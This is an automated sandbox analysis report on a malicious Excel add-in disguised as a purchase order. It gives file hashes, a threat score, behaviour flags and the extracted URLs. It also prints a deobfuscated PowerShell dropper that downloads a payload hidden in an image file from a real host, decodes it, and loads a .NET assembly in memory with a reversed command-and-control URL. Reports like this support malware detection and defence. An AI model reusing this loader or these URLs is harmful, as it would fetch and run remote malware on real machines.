General

  • Target

    PO-674394.xlam.xlsx

  • Size

    642KB

  • Sample

    231011-hggxpsfe8z

  • MD5

    66013791a9a70b8b6429a842ee029ccd

  • SHA1

    a8c5aaf7a3f794bda85717f264a65075c80a10a1

  • SHA256

    ad6dabfbf9b343f2a04f6cdfbc34411b378212dea73d669cab262564420d6ecb

  • SHA512

    9935eb3e66ccf49d3342c88324c6f838239e68d7e28010b1cb4b73b4db0351d200fdfec67a6d2ee53b14b6e9812b5eefcd004a9ea46bc3f99fd96abea206520f

  • SSDEEP

    12288:Kqs/irVm8pm8UKkayx+Uu1oNR4rdCTflYmWu4K+7ZGGnaZZg9xQ9ar6MnDwI:Bqyg8rovs6WC7Su4K+7OZSnUHMnDl

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
# Stage 1: download a file served as a JPG from an image host and read its bytes as ASCII text
$imageurl = "https://uploaddeimagens.com.br/images/004/616/609/original/rump_vbs.jpg?1695408937"
$webclient = new-object system.net.webclient
$imagebytes = $webclient.downloaddata("https://uploaddeimagens.com.br/images/004/616/609/original/rump_vbs.jpg?1695408937")
$imagetext = ([system.text.encoding]::ascii).getstring($imagebytes)
# Stage 2: carve the Base64 blob that sits between marker strings inside the downloaded file
$startflag = "<<BASE64_START>>"
$endflag = "<<BASE64_END>>"
$startindex = $imagetext.indexof("<<BASE64_START>>")
$endindex = $imagetext.indexof("<<BASE64_END>>")
# condition and offset adjustment as emitted by the deobfuscator (surrounding control flow not shown)
$startindex -ge 0 -and $endindex -gt $startindex
$startindex = $startflag.length
$base64length = $endindex - $startindex
$base64command = $imagetext.substring($startindex, $base64length)
# Stage 3: decode the blob into a .NET assembly, load it in memory and invoke Fiber.Home.VAI
$commandbytes = [system.convert]::frombase64string($base64command)
$loadedassembly = [system.reflection.assembly]::load($commandbytes)
$type = $loadedassembly.gettype("Fiber.Home")
# first argument is passed as a reversed string; remaining arguments are filler values
$method = ($type.getmethod("VAI")).invoke($null, [object[]]"txt.smhogn/25.84.011.97//:ptth", "dfdfd", "dfdf", "dfdf", "dadsa", "de", "cu")
URLs
ps1.dropper

https://uploaddeimagens.com.br/images/004/616/609/original/rump_vbs.jpg?1695408937

exe.dropper

https://uploaddeimagens.com.br/images/004/616/609/original/rump_vbs.jpg?1695408937

Targets

    • Target

      PO-674394.xlam.xlsx

    Score
    10/10
    • Blocklisted process makes network request

    • Drops file in System32 directory

MITRE ATT&CK Enterprise v15
